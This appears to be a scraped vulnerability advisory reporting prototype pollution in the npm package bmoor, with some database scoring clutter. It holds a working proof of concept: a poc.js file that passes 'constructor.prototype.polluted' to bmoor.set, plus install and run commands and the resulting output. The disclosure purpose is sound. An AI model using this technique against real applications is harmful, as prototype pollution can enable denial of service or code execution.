Lucene search

K
huntrMohanl0l1-NPM-BMOOR
HistoryNov 18, 2020 - 12:00 a.m.

Prototype Pollution in b-heilman/bmoor

2020-11-1800:00:00
mohanl0l
www.huntr.dev
9

0.004 Low

EPSS

Percentile

74.9%

Description

bmoor is vulnerable to Prototype Pollution.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.

Proof of Concept

  1. Create the following PoC file:
// poc.js
const bmoor = require('bmoor');
var obj = {}
console.log("Before : " + {}.polluted);
bmoor.set(obj,"constructor.prototype.polluted","Yes! Its Polluted");
console.log("After : " + {}.polluted);
  1. Execute the following commands in another terminal:
npm i bmoor # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted

0.004 Low

EPSS

Percentile

74.9%